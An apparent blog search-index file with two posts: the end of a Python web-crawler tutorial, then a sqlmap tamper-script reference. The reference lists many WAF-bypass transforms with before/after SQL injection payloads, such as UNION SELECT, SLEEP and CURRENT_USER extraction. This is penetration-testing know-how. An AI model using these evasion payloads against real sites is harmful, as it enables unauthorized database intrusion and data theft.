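<p>  <img src="https:////upload-images.jianshu.io/upload_images/2255795-569c648c2c6d1f89.jpg?imageMogr2/auto-orient/strip%7CimageView2/2/w/819" alt="img"></p><p>  1-3.jpg</p>
<h3 id="响应"><a href="#响应" class="headerlink" title="响应"></a>Responses</h3>
<p>A response is returned from the server to the client and has three parts: the status code, the response headers, and the response body.</p>
<ul><li>Response status code</li></ul>
<p>  <img src="https:////upload-images.jianshu.io/upload_images/2255795-5804a72cba62b6fd.jpg?imageMogr2/auto-orient/strip%7CimageView2/2/w/1000" alt="img"></p><p>  1-4.jpg</p>
<ul><li>Response headers contain the server's reply information for the request, such as Content-Type, Server, and Set-Cookie.</li></ul>
<p>  <img src="https:////upload-images.jianshu.io/upload_images/2255795-a61e4fb72096b27e.jpg?imageMogr2/auto-orient/strip%7CimageView2/2/w/1000" alt="img"></p><p>  1-4.jpg</p>
<ul><li>Response body: the actual payload of the response. When a web page is requested, the body is the page's HTML; when an image is requested, the body is the image's binary data. After a crawler requests a page, the response body is what it parses.</li></ul>
<h1 id="二、爬虫基本工作原理"><a href="#二、爬虫基本工作原理" class="headerlink" title="二、爬虫基本工作原理"></a>2. How Crawlers Work</h1>
<h3 id="爬虫基本类型"><a href="#爬虫基本类型" class="headerlink" title="爬虫基本类型"></a>Basic types of crawlers</h3>
<ul><li>General-purpose crawlers are a key component of search-engine crawling systems (Baidu, Google, Yahoo, and so on). Their main purpose is to download pages from the Internet to local storage, forming a mirror of Internet content.</li><li>Focused crawlers are crawlers built for a specific topic or need. Unlike general-purpose search-engine crawlers, they filter content while crawling and try to fetch only pages relevant to that need.</li><li>Incremental crawlers: an incremental update changes only what has changed and leaves the rest untouched. An incremental crawler therefore fetches only pages that are new or whose content has changed, and skips pages that have not changed.</li></ul>
<h3 id="爬虫的基本工作流程（以通用爬虫为例）"><a href="#爬虫的基本工作流程（以通用爬虫为例）" class="headerlink" title="爬虫的基本工作流程（以通用爬虫为例）"></a>The basic crawler workflow (using a general-purpose crawler as the example)</h3>
<p><img src="https:////upload-images.jianshu.io/upload_images/2255795-cffe88e6b8b23391.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/265" alt="img"></p><p>      1-7.png</p>
<h5 id="第一步：抓取网页"><a href="#第一步：抓取网页" class="headerlink" title="第一步：抓取网页"></a>Step 1: Fetch pages</h5>
<ul><li>Select a set of seed URLs and put them into the to-crawl URL queue.</li><li>Take a URL from the to-crawl queue, resolve its host's IP address through DNS, download the page at that URL, store it in the downloaded-page repository, and move the URL into the crawled URL queue.</li><li>Analyze the pages behind the URLs in the crawled queue, extract the other URLs they contain, and put those into the to-crawl queue, which starts the next cycle.</li></ul>
<h5 id="第二步：数据存储"><a href="#第二步：数据存储" class="headerlink" title="第二步：数据存储"></a>Step 2: Store the data</h5>
<ul><li>The search engine stores the pages fetched by the crawler in its raw page database. The page data is exactly the same HTML that a user's browser would receive.</li><li>While crawling, search-engine spiders also perform some duplicate-content detection. If a low-ranked site turns out to contain large amounts of plagiarized, scraped, or copied content, the spider will probably stop crawling it.</li></ul>
<h5 id="第三步：预处理"><a href="#第三步：预处理" class="headerlink" title="第三步：预处理"></a>Step 3: Preprocess</h5>
<ul><li>The search engine runs the fetched pages through several preprocessing steps, such as text extraction, Chinese word segmentation, noise removal (copyright notices, navigation bars, advertisements, and so on), indexing, link-relationship computation, and special-file handling.</li><li>Besides HTML files, search engines can usually fetch and index many text-based file types, such as PDF, Word, WPS, XLS, PPT, and TXT. These file types often show up in search results.</li><li>However, search engines cannot yet process non-text content such as images, video, and Flash, nor can they execute scripts and programs.</li></ul>
<h5 id="第四步：操作数据，实现需求"><a href="#第四步：操作数据，实现需求" class="headerlink" title="第四步：操作数据，实现需求"></a>Step 4: Work with the data to meet the requirement</h5>
<p>For example, collecting all the reviews for a category of products on JD.com together with the membership level of each buyer.</p>
<h3 id="爬虫基本结构"><a href="#爬虫基本结构" class="headerlink" title="爬虫基本结构"></a>Basic structure of a crawler</h3>
<p><img src="https:////upload-images.jianshu.io/upload_images/2255795-f1dc7e8061ac95ed.jpg?imageMogr2/auto-orient/strip%7CimageView2/2/w/813" alt="img"></p><p>1-6.jpg</p>
<h3 id="爬虫的抓取策略"><a href="#爬虫的抓取策略" class="headerlink" title="爬虫的抓取策略"></a>Crawling strategies</h3>
<ul><li>Depth-first traversal</li><li>Breadth-first traversal</li><li>Backlink-count strategy</li><li>Partial PageRank strategy</li><li>OPIC strategy</li></ul>
<h3 id="爬虫的更新策略"><a href="#爬虫的更新策略" class="headerlink" title="爬虫的更新策略"></a>Update strategies</h3>
<ul><li>Historical-reference strategy</li><li>User-experience strategy</li><li>Cluster-sampling strategy</li></ul>
<h3 id="网页分析算法"><a href="#网页分析算法" class="headerlink" title="网页分析算法"></a>Page analysis algorithms</h3>
<ul><li>Algorithms based on user behavior</li><li>Algorithms based on network topology</li><li>Algorithms based on page content</li></ul>]]></content>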
      
      
      <categories>
          
          <category> Python </category>
          
      </categories>
      
      
        <tags>
            
            <tag> Python </tag>
            
        </tags>
      
    </entry>
    
    
    
    <entry>
      <title>sqlmap Usage Notes: tamper</title>
      <link href="/Coderzgh.github.io/2019/04/01/sqlmap-tamper/"/>
      <url>/Coderzgh.github.io/2019/04/01/sqlmap-tamper/</url>
      
        <content type="html"><![CDATA[<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><script>     (adsbygoogle = window.adsbygoogle || []).push({          google_ad_client: "ca-pub-3405437608986450",          enable_page_level_ads: true     });</script><p>sqlmap在默认的的情况下除了使用char()函数防止出现单引号，没有对注入的数据进行修改，还可以使用–tamper参数对数据做修改来绕过waf等设备。</p><h4 id="0x01-命令如下"><a href="#0x01-命令如下" class="headerlink" title="0x01 命令如下"></a>0x01 命令如下</h4><pre class=" language-python"><code class="language-python"><span class="token number">1</span>  sqlmap <span class="token operator">-</span>u <span class="token punctuation">[</span>url<span class="token punctuation">]</span> <span class="token operator">-</span><span class="token operator">-</span>tamper <span class="token punctuation">[</span>模块名<span class="token punctuation">]</span></code></pre><p>sqlmap的绕过脚本在目录usr/share/golismero/tools/sqlmap/tamper下<br>目前sqlmap 1.2.9版本共有37个</p><p>可以使用–identify-waf对一些网站是否有安全防护进行试探</p><h4 id="0x02-常用tamper脚本"><a href="#0x02-常用tamper脚本" class="headerlink" title="0x02 常用tamper脚本"></a>0x02 常用tamper脚本</h4><p>apostrophemask.py</p><p>适用数据库：ALL<br>作用：将引号替换为utf-8，用于过滤单引号<br>使用脚本前：tamper(“1 AND ‘1’=’1”)<br>使用脚本后：1 AND %EF%BC%871%EF%BC%87=%EF%BC%871</p><p>base64encode.py</p><p>适用数据库：ALL<br>作用：替换为base64编码<br>使用脚本前：tamper(“1’ AND SLEEP(5)#”)<br>使用脚本后：MScgQU5EIFNMRUVQKDUpIw==</p><p>multiplespaces.py</p><p>适用数据库：ALL<br>作用：围绕sql关键字添加多个空格<br>使用脚本前：tamper(‘1 UNION SELECT foobar’)<br>使用脚本后：1 UNION SELECT foobar</p><p>space2plus.py</p><p>适用数据库：ALL<br>作用：用加号替换空格<br>使用脚本前：tamper(‘SELECT id FROM users’)<br>使用脚本后：SELECT+id+FROM+users</p><p>nonrecursivereplacement.py</p><p>适用数据库：ALL<br>作用：作为双重查询语句，用双重语句替代预定义的sql关键字（适用于非常弱的自定义过滤器，例如将select替换为空）<br>使用脚本前：tamper(‘1 UNION SELECT 2–’)<br>使用脚本后：1 UNIOUNIONN SELESELECTCT 2–</p><p>space2randomblank.py</p><p>适用数据库：ALL<br>作用：将空格替换为其他有效字符<br>使用脚本前：tamper(‘SELECT id FROM 
users')<br>After: SELECT%0Did%0DFROM%0Ausers</p><p>unionalltounion.py</p><p>Applies to: ALL<br>Function: replaces UNION ALL SELECT with UNION SELECT<br>Before: tamper('-1 UNION ALL SELECT')<br>After: -1 UNION SELECT</p><p>securesphere.py</p><p>Applies to: ALL<br>Function: appends a specially crafted string<br>Before: tamper('1 AND 1=1')<br>After: 1 AND 1=1 and '0having'='0having'</p><p>space2dash.py</p><p>Applies to: ALL<br>Function: replaces each space with a dash comment (--) followed by a random string and a newline<br>Before: tamper('1 AND 9227=9227')<br>After: 1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227</p><p>space2mssqlblank.py</p><p>Applies to: Microsoft SQL Server<br>Tested against: Microsoft SQL Server 2000, Microsoft SQL Server 2005<br>Function: replaces each space with a random blank character from the set ('%01', '%02', '%03', '%04', '%05', '%06', '%07', '%08', '%09', '%0B', '%0C', '%0D', '%0E', '%0F', '%0A')<br>Before: tamper('SELECT id FROM users')<br>After: SELECT%0Eid%0DFROM%07users</p><p>between.py</p><p>Tested against: Microsoft SQL Server 2005; MySQL 4, 5.0 and 5.5; Oracle 10g; PostgreSQL 8.3, 8.4, 9.0<br>Function: replaces the greater-than operator (&gt;) with NOT BETWEEN 0 AND #<br>Before: tamper('1 AND A &gt; B--')<br>After: 1 AND A NOT BETWEEN 0 AND B--</p><p>percentage.py</p><p>Applies to: ASP<br>Tested against: Microsoft SQL Server 2000, 2005; MySQL 5.1.56, 5.5.11; PostgreSQL 9.0<br>Function: adds a percent sign (%) in front of each character<br>Before: tamper('SELECT FIELD FROM TABLE')<br>After: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E</p><p>sp_password.py</p><p>Applies to: MSSQL<br>Function: appends sp_password to the end of the payload so that it is automatically obfuscated in the T-SQL logs<br>Before: tamper('1 AND 9227=9227-- ')<br>After: 1 AND 9227=9227-- sp_password</p><p>charencode.py</p><p>Tested against: Microsoft SQL Server 2005; MySQL 4, 5.0 and 5.5; Oracle 10g; PostgreSQL 8.3, 8.4, 9.0<br>Function: URL-encodes every character of the given payload (already-encoded characters are not processed)<br>Before: tamper('SELECT FIELD FROM%20TABLE')<br>After: %53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45</p><p>randomcase.py</p><p>Tested against: Microsoft SQL Server 2005; MySQL 4, 5.0 and 5.5; Oracle 10g; PostgreSQL 8.3, 8.4, 9.0<br>Function: randomizes the letter case of keywords<br>Before: tamper('INSERT')<br>After: INseRt</p><p>charunicodeencode.py</p><p>Applies to: ASP, ASP.NET<br>Tested against: Microsoft SQL Server 2000/2005, MySQL 5.1.56, PostgreSQL 
9.0.3<br>Function: Unicode-URL-encodes the characters of the payload (%uXXXX form)<br>Before: tamper('SELECT FIELD%20FROM TABLE')<br>After: %u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045</p><p>space2comment.py</p><p>Tested against: Microsoft SQL Server 2005; MySQL 4, 5.0 and 5.5; Oracle 10g; PostgreSQL 8.3, 8.4, 9.0<br>Function: replaces each space with /**/<br>Before: tamper('SELECT id FROM users')<br>After: SELECT/**/id/**/FROM/**/users</p><p>equaltolike.py</p><p>Tested against: Microsoft SQL Server 2005; MySQL 4, 5.0 and 5.5<br>Function: replaces = with LIKE<br>Before: tamper('SELECT * FROM users WHERE id=1')<br>After: SELECT * FROM users WHERE id LIKE 1</p><p>greatest.py</p><p>Tested against: MySQL 4, 5.0 and 5.5; Oracle 10g; PostgreSQL 8.3, 8.4, 9.0<br>Function: replaces &gt; with GREATEST, to bypass filters on &gt;<br>Before: tamper('1 AND A &gt; B')<br>After: 1 AND GREATEST(A,B+1)=A</p><p>ifnull2ifisnull.py</p><p>Applies to: MySQL, SQLite (possibly), SAP MaxDB (possibly)<br>Tested against: MySQL 5.0 and 5.5<br>Function: replaces instances like IFNULL(A, B) with IF(ISNULL(A), B, A), to bypass filters on IFNULL<br>Before: tamper('IFNULL(1, 2)')<br>After: IF(ISNULL(1),2,1)</p><p>modsecurityversioned.py</p><p>Applies to: MySQL<br>Tested against: MySQL 5.0<br>Function: wraps the query in a MySQL versioned inline comment<br>Before: tamper('1 AND 2&gt;1--')<br>After: 1 /*!30874AND 2&gt;1*/--</p><p>space2mysqlblank.py</p><p>Applies to: MySQL<br>Tested against: MySQL 5.1<br>Function: replaces each space with a random blank character from the set ('%09', '%0A', '%0C', '%0D', '%0B')<br>Before: tamper('SELECT id FROM users')<br>After: SELECT%0Bid%0DFROM%0Cusers</p><p>modsecurityzeroversioned.py</p><p>Applies to: MySQL<br>Tested against: MySQL 5.0<br>Function: wraps the query in a zero-versioned inline comment (/*!00000*/)<br>Before: tamper('1 AND 2&gt;1--')<br>After: 1 /*!00000AND 2&gt;1*/--</p><p>space2mysqldash.py</p><p>Applies to: MySQL, MSSQL<br>Function: replaces each space with a dash comment (--) followed by a newline<br>Before: tamper('1 AND 9227=9227')<br>After: 1--%0AAND--%0A9227=9227</p><p>bluecoat.py</p><p>Applies to: Blue Coat SGOS<br>Tested against: MySQL 5.1, SGOS<br>Function: replaces the space after the SQL statement with a valid random blank character, then replaces = with LIKE<br>Before: tamper('SELECT id FROM users where id = 1')<br>After: SELECT%09id FROM users where id LIKE 
1</p><p>versionedkeywords.py</p><p>Applies to: MySQL<br>Tested against: MySQL 4.0.18, 5.1.56, 5.5.11<br>Function: encloses each non-function keyword in a MySQL versioned comment<br>Before: tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#')<br>After: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#</p><p>halfversionedmorekeywords.py</p><p>Applies to: MySQL &lt; 5.1<br>Tested against: MySQL 4.0.18/5.0.22<br>Function: adds a MySQL versioned comment before each keyword<br>Before: tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")<br>After: value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa</p><p>space2morehash.py</p><p>Applies to: MySQL &gt;= 5.1.13<br>Tested against: MySQL 5.1.41<br>Function: replaces each space with a hash character (#) followed by a random string and a newline<br>Before: tamper('1 AND 9227=9227')<br>After: 1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227</p><p>apostrophenullencode.py</p><p>Applies to: ALL<br>Function: replaces the single quote with an illegal double-byte Unicode counterpart<br>Before: tamper("1 AND '1'='1")<br>After: 1 AND %00%271%00%27=%00%271</p><p>appendnullbyte.py</p><p>Applies to: ALL<br>Function: appends a URL-encoded NULL byte to the end of the payload<br>Before: tamper('1 AND 1=1')<br>After: 1 AND 1=1%00</p><p>chardoubleencode.py</p><p>Applies to: ALL<br>Function: double-URL-encodes every character of the given payload (already-encoded characters are not processed)<br>Before: tamper('SELECT FIELD FROM%20TABLE')<br>After: %2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545</p><p>unmagicquotes.py</p><p>Applies to: ALL<br>Function: replaces the single quote with the multi-byte combination %bf%27 and adds a generic comment at the end<br>Before: tamper("1' AND 1=1")<br>After: 1%bf%27 AND 
1=1--</p><p>randomcomments.py</p><p>Applies to: ALL<br>Function: splits SQL keywords with comment markers<br>Before: tamper('INSERT')<br>After: I/**/N/**/SERT</p><h4 id="0x03-附录："><a href="#0x03-附录：" class="headerlink" title="0x03 Appendix"></a>0x03 Appendix</h4><p><img src="https://img2018.cnblogs.com/blog/1358580/201906/1358580-20190605194338464-982309411.png" alt="img"></p><h4 id="0x04-在熟悉了tamper脚本之后，我们应该学习tamper绕过脚本的编写规则，来应对复杂的实际环境。"><a href="#0x04-在熟悉了tamper脚本之后，我们应该学习tamper绕过脚本的编写规则，来应对复杂的实际环境。" class="headerlink" title="0x04 Once familiar with the tamper scripts, we should learn the rules for writing our own tamper bypass scripts, in order to cope with complex real-world environments."></a>0x04 Once familiar with the tamper scripts, we should learn the rules for writing our own tamper bypass scripts, in order to cope with complex real-world environments.</h4>]]></content>
      
      
      <categories>
          
          <category> sqlmap </category>
          
      </categories>
      
      
        <tags>
            
            <tag> sqlmap </tag>
            
        </tags>
      
    </entry>
    
    
  
  
</search>